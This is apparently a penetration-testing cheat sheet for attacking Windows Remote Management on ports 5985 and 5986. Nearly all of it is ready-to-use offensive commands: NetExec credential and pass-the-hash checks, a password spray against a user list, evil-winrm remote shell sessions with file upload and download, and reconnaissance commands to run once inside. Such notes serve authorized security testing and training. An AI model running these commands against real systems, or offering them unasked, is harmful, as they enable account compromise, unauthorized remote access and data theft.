WinRM Enumeration (5985, 5986)#
Test WinRM with NetExec#
netexec winrm $IP -u "$USER" -p "$PASS"Test WinRM with a hash#
netexec winrm $IP -u administrator -H <ntlm_hash>Connect with evil-winrm#
evil-winrm -i $IP -u "$USER" -p "$PASS"Connect with evil-winrm over SSL#
evil-winrm -i $IP -u "$USER" -p "$PASS" -SPassword spray only after lockout and replay checks#
netexec winrm $IP -u users.txt -p 'Password123!' --continue-on-successUpload file with evil-winrm#
evil-winrm> upload /local/path/file.exe C:\Windows\Temp\working\file.exe
Download file with evil-winrm#
evil-winrm> download C:\Windows\Temp\working\file.txt /local/path/file.txt
Initial commands after access#
whoami /all
hostname
ipconfig /all
net user
net localgroup administrators